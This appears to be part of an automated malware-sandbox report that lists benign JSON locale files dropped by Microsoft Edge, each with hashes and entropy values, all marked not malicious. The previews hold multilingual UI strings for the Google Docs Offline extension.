                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):990
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                            MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                            SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                            SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                            SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1658
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                            MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                            SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                            SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                            SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1672
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                            MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                            SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                            SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                            SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):935
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                            MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                            SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                            SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                            SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1065
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                            MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                            SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                            SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                            SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2771
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                            MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                            SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                            SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                            SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):858
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                            MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                            SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                            SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                            SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):954
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                            MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                            SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                            SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                            SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):899
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                            MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                            SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                            SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                            SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2230
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                            MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                            SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                            SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                            SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1160
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                            MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                            SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                            SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                            SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):3264
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                            MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                            SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                            SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                            SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):3235
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                            MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                            SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                            SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                            SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):3122
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                            MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                            SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                            SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                            SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1895
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                            MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                            SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                            SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                            SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1042
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                            MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                            SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                            SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                            SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2535
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                            MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                            SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                            SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                            SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1028
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                            MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                            SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                            SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                            SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                            Malicious:false
